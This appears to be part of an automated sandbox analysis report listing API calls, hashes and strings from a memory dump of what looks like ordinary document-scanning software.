                                                                                                  • Part of subcall function 0042AA40: InterlockedDecrement.KERNEL32(?), ref: 0042AB4C
                                                                                                  • Part of subcall function 0042AA40: InterlockedDecrement.KERNEL32(?), ref: 0042AB68
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00427227
                                                                                                • InterlockedDecrement.KERNEL32(0000180A), ref: 0042724A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked
                                                                                                • String ID: setting brightness. brightness value: $xMS$xMS
                                                                                                • API String ID: 3448037634-3491854909
                                                                                                • Opcode ID: 0a86474ab0d6c89088b0729fc9b1aed7a3a3b5b1eb10445aa0a9ea9be02eb12a
                                                                                                • Instruction ID: fed518faadff3d3ecae04b0da0241b37a8eb6420eefe8f639909d254bbd878bd
                                                                                                • Opcode Fuzzy Hash: 0a86474ab0d6c89088b0729fc9b1aed7a3a3b5b1eb10445aa0a9ea9be02eb12a
                                                                                                • Instruction Fuzzy Hash: E641C071A00619AFCB01DF64DC55BBFBBB9BF45750F10822AF805A7381EB78AD018B95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0045024F
                                                                                                  • Part of subcall function 0044FE00: SystemParametersInfoW.USER32 ref: 0044FE4F
                                                                                                • SendMessageW.USER32(?,00000111,?), ref: 00450292
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: InfoMessageParametersSendSystemWindow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\src\unicodecomboboxawl.cpp
                                                                                                • API String ID: 2203680546-2663756660
                                                                                                • Opcode ID: 4acbf1123b2d21b0138087e9647c54f10a75cf5736fa7e4a18bf0c70eb7fae58
                                                                                                • Instruction ID: 032c1e518166a636d19af5f41451233376ba17e35ad45c41f2be886ec738d273
                                                                                                • Opcode Fuzzy Hash: 4acbf1123b2d21b0138087e9647c54f10a75cf5736fa7e4a18bf0c70eb7fae58
                                                                                                • Instruction Fuzzy Hash: 733145343407006BE724AA258D47BBB7295AB40B06F44012FFD56D62D3EF6CAD09C65D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetIconInfo.USER32(?,?), ref: 004301FB
                                                                                                • DeleteObject.GDI32(?), ref: 00430295
                                                                                                • DeleteObject.GDI32(?), ref: 004302B4
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\userobjectawl.cpp, xrefs: 004301CF
                                                                                                • @fO, xrefs: 004301D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalDeleteObjectSectionValue$EnterException@8IconInfoLeaveThrow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\userobjectawl.cpp
                                                                                                • API String ID: 3281245791-4135557790
                                                                                                • Opcode ID: 782a5fa0b3a600e9558b6e850d63b025e18623fed2699d06aac9475fb5b40972
                                                                                                • Instruction ID: 7fc1fcd69da7197f59ebfbc8e1236e42ae69e60fd424409a06d8248fac71eccd
                                                                                                • Opcode Fuzzy Hash: 782a5fa0b3a600e9558b6e850d63b025e18623fed2699d06aac9475fb5b40972
                                                                                                • Instruction Fuzzy Hash: C94157B4D003089BDB10CFA9C94979EFBF8FF58714F24825AE814B7380D7B95A048BA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetSystemInfo.KERNEL32(?), ref: 00483363
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: InfoSystem
                                                                                                • String ID: @fO$@fO$PMS$d:\build\teamagent\_work\1\s\0\fineobjects\src\alloc.cpp
                                                                                                • API String ID: 31276548-2881879210
                                                                                                • Opcode ID: b882838e7179d99c7211ac2f27de694beeb45b42e1d713abce85be02fcd8649e
                                                                                                • Instruction ID: d8f52e37e4df271a8bdb762cfcf9877201d266c283cc1a9edb34c084678e7bc2
                                                                                                • Opcode Fuzzy Hash: b882838e7179d99c7211ac2f27de694beeb45b42e1d713abce85be02fcd8649e
                                                                                                • Instruction Fuzzy Hash: 973173B17007018BE728DF29D85572B77E4FB58705F00492EE88AC7790E7B4E944CB49
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004204A2
                                                                                                • InterlockedDecrement.KERNEL32(00000004), ref: 004204C7
                                                                                                • InterlockedDecrement.KERNEL32(0000000100000003), ref: 004204FE
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$CriticalDecrementSectionValue$EnterException@8IncrementLeaveThrow
                                                                                                • String ID: @fO$WiaDataSource.cpp
                                                                                                • API String ID: 3178549284-3941459983
                                                                                                • Opcode ID: 2c82e4f372f4e1ece581aecc1f92acf4f618ee2421b0736369bafc87f3fa0333
                                                                                                • Instruction ID: dc364797e30b4bb3cd30c4a57abfa4689611d4f5da8af953af37670e19f6ec01
                                                                                                • Opcode Fuzzy Hash: 2c82e4f372f4e1ece581aecc1f92acf4f618ee2421b0736369bafc87f3fa0333
                                                                                                • Instruction Fuzzy Hash: CF216D76B01224ABC720DF18D944B6ABBE8EF44B14F15815AED099B782D779ED01CBC8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                  • Part of subcall function 0041E080: InterlockedDecrement.KERNEL32(?), ref: 0041E0ED
                                                                                                  • Part of subcall function 0041E080: InterlockedDecrement.KERNEL32(?), ref: 0041E14B
                                                                                                  • Part of subcall function 0041E080: InterlockedDecrement.KERNEL32(?), ref: 0041E1AA
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0041D4BD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked$CriticalSectionValue$EnterException@8LeaveThrow
                                                                                                • String ID: ..\Shared\ScanSession.cpp$@fO$@fO$xMS
                                                                                                • API String ID: 1715702393-3593132634
                                                                                                • Opcode ID: 66651292c447ce0778e88ead6f44f15a755e8a8d0ef6b630ca33fc63ac2d683d
                                                                                                • Instruction ID: 3cd255a33772b5be1d980d9a290765c57b641090eca427fc47be2271a02bddf1
                                                                                                • Opcode Fuzzy Hash: 66651292c447ce0778e88ead6f44f15a755e8a8d0ef6b630ca33fc63ac2d683d
                                                                                                • Instruction Fuzzy Hash: 6121D3B6A40618ABD725AF28C806FAF7764EB05B10F00865FF94197780DB7EA900C7CD
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0045F2DF
                                                                                                • SendMessageW.USER32(?,00000417,00000000,?), ref: 0045F313
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h
                                                                                                • API String ID: 701072176-3237162522
                                                                                                • Opcode ID: fb94243431a1970a5050981403ca3fe57f37b5c7cdbf4fd1aa75086cec1ce6dc
                                                                                                • Instruction ID: 0bb76263530c7f8a1395deea673debbe615b58ed6f97cb68993f6c6699c4825b
                                                                                                • Opcode Fuzzy Hash: fb94243431a1970a5050981403ca3fe57f37b5c7cdbf4fd1aa75086cec1ce6dc
                                                                                                • Instruction Fuzzy Hash: 1A2174702443056BE3109F25DC46F3BB7E8AF94B45F00096EF984D7291EBB5D9048A5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004891F7
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$DecrementEnterException@8InterlockedLeaveThrow
                                                                                                • String ID: @fO$GhH$d:\build\teamagent\_work\1\s\0\fineobjects\inc\object.h$xMS
                                                                                                • API String ID: 132347594-1532836849
                                                                                                • Opcode ID: 77e13a48ecf52dd4e151a79680a855d1222cd85350a74cb3fdad4acaced8ccaa
                                                                                                • Instruction ID: 79a1cec3faa2688ba030bef30432e05f857761a1724f179a40b947537551bbf6
                                                                                                • Opcode Fuzzy Hash: 77e13a48ecf52dd4e151a79680a855d1222cd85350a74cb3fdad4acaced8ccaa
                                                                                                • Instruction Fuzzy Hash: 1A210472640614ABC710EF59DC01B7EB769FB81B21F044A6EF911A7380D739AC00CB98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CopyAcceleratorTableW.USER32(?,00000000,00000000,?,?,?,?,?,0043DB88,00000000), ref: 0043D3E3
                                                                                                • CopyAcceleratorTableW.USER32(?,?,00000000,?,00000000,00000000,?,?,?,?,?,0043DB88,00000000), ref: 0043D45B
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AcceleratorCopyCriticalSectionTableValue$EnterException@8LeaveThrow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\src\acceltableawl.cpp
                                                                                                • API String ID: 3592489560-3594018571
                                                                                                • Opcode ID: 32d13588f1d488321780c656f25cd0adb830432b953c85675e907348eb703fc5
                                                                                                • Instruction ID: 3c777bcddfa6ca98038a999453a81a0a50010de3616441703c7eb3d36ffab053
                                                                                                • Opcode Fuzzy Hash: 32d13588f1d488321780c656f25cd0adb830432b953c85675e907348eb703fc5
                                                                                                • Instruction Fuzzy Hash: D4110671B4061937E7241A386C46B7BB6499788B14F15423EFE09DB3C2DEB9FC0442D8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,DrawThemeBackground), ref: 0044D340
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AddressProc
                                                                                                • String ID: @fO$DrawThemeBackground$UxTheme.dll$d:\build\teamagent\_work\1\s\0\awl\src\themeawl.cpp
                                                                                                • API String ID: 190572456-3728942842
                                                                                                • Opcode ID: a89436fba15c5728e09ab734fda58a0c11f1c860eb48211f47a91a20cd0a7ee1
                                                                                                • Instruction ID: d3f3e934623925f47eda48e16bbedfcb7d16c35bcdaaab96de1be5abc507213d
                                                                                                • Opcode Fuzzy Hash: a89436fba15c5728e09ab734fda58a0c11f1c860eb48211f47a91a20cd0a7ee1
                                                                                                • Instruction Fuzzy Hash: 0C21F330A04645EFDB10CF59DD80B6A3BE8F715728F10432AE814D77D0E7798800BB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00428E00: InterlockedIncrement.KERNEL32(00530380), ref: 00428E71
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004293F5
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00429418
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: set transfer type: $xMS$xMS
                                                                                                • API String ID: 2574743344-3484719096
                                                                                                • Opcode ID: 99b45029c969b94dd0d82640ada7f9813d4ab76f61ab2be644223b9b590262aa
                                                                                                • Instruction ID: 8aac996a5b274eea26bd7fbf456a771a2ec1b3b54ac6c96a56b98edbbedddc0b
                                                                                                • Opcode Fuzzy Hash: 99b45029c969b94dd0d82640ada7f9813d4ab76f61ab2be644223b9b590262aa
                                                                                                • Instruction Fuzzy Hash: 0421F571A01A25ABCB11EF54DC05BAF7768AF04711F10452EF812B7382D7786E00C7DA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0044446E
                                                                                                • CombineRgn.GDI32(00000000,?,00000000,00000004), ref: 004444D1
                                                                                                • DeleteObject.GDI32(00000000), ref: 00444500
                                                                                                Strings
                                                                                                • @fO, xrefs: 00444486
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\clientedgethemedrawingawl.cpp, xrefs: 0044447C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CombineDeleteObjectWindow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\clientedgethemedrawingawl.cpp
                                                                                                • API String ID: 3469718145-3571409429
                                                                                                • Opcode ID: 527bc72913d9d9162062769d1657eb1e21b7a35a2a208bc26d46dd1439d6fecc
                                                                                                • Instruction ID: b68d06c9b487c7254c87f7b0b6cf7fe5112a4617427d670d1130eab44777d10d
                                                                                                • Opcode Fuzzy Hash: 527bc72913d9d9162062769d1657eb1e21b7a35a2a208bc26d46dd1439d6fecc
                                                                                                • Instruction Fuzzy Hash: AC219271A41714ABE720DF999D09BAFBAB8FF84B55F10421AF914A72C1D7B44A00CBE4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00423340: InterlockedIncrement.KERNEL32(?), ref: 004233B4
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004294D4
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004294F7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: set format type: $xMS$xMS
                                                                                                • API String ID: 2574743344-38210134
                                                                                                • Opcode ID: 26cbb0bdc5f3d1cf9dedae310b04d593563dfc026ebd3696b74880fca15a9320
                                                                                                • Instruction ID: 2ada7b8959d0ee9c861fb09296cf30133b09b77c863c1e059c0c94afaed184ff
                                                                                                • Opcode Fuzzy Hash: 26cbb0bdc5f3d1cf9dedae310b04d593563dfc026ebd3696b74880fca15a9320
                                                                                                • Instruction Fuzzy Hash: F221A172A01A25ABCB11EF54C801BAFBB75BF04711F10451EF912A7391C7386E0187D9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004A33E7
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 004A3407
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked
                                                                                                • String ID: <WS$xMS$xMS
                                                                                                • API String ID: 3448037634-4113163899
                                                                                                • Opcode ID: 00e9c5ed9aea4305c5d6c0cee146e9919697c13ddb1cd4ff5e6ebfbc58896541
                                                                                                • Instruction ID: f1fb58afc244b44aea7cd5cc4307d7c24d350657fd83c9a0d0ae70161f81b7cc
                                                                                                • Opcode Fuzzy Hash: 00e9c5ed9aea4305c5d6c0cee146e9919697c13ddb1cd4ff5e6ebfbc58896541
                                                                                                • Instruction Fuzzy Hash: 3821B375A00644ABCB01EF99C8027AFBBA9EF84715F00412DF415A3381DBB95E01C79A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00482066
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 00482099
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00482119
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: xMS$xMS
                                                                                                • API String ID: 2574743344-1285152028
                                                                                                • Opcode ID: c9922f808956527471d80ded12eca24107e7b895c42566e1d488df8ab952ab72
                                                                                                • Instruction ID: 1bde7572ad3988b2ab12d73e6e7fe09659cde359d4ce71ba354a504dec83980a
                                                                                                • Opcode Fuzzy Hash: c9922f808956527471d80ded12eca24107e7b895c42566e1d488df8ab952ab72
                                                                                                • Instruction Fuzzy Hash: 4C217A75901645DFCB10EF98DD44BAEBBB8FB49710F10055AE901A3391C3B5AE04DBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00482176
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 004821A9
                                                                                                • InterlockedDecrement.KERNEL32(00000001), ref: 0048222A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: xMS$xMS
                                                                                                • API String ID: 2574743344-1285152028
                                                                                                • Opcode ID: 4f4bdaf046d610cdb5acd79fe7ff17262f61021ca5a1e7ca9672d8fe3c9d94f8
                                                                                                • Instruction ID: 342fcc233b2a1205ce8d9c7d138abb8151da320c4324b9eb21c35de33410e76c
                                                                                                • Opcode Fuzzy Hash: 4f4bdaf046d610cdb5acd79fe7ff17262f61021ca5a1e7ca9672d8fe3c9d94f8
                                                                                                • Instruction Fuzzy Hash: ED218C71900B459FCB11EF98CD00BAEBBF8FB49710F10056AE901A3391C7796E04DBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\menubarawl.cpp, xrefs: 0043F39A
                                                                                                • AWL::createDefaultMenuFont, xrefs: 0043F3A4
                                                                                                • ::SystemParametersInfo( SPI_GETNONCLIENTMETRICS, metrics.cbSize, &metrics, 0 ), xrefs: 0043F39F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
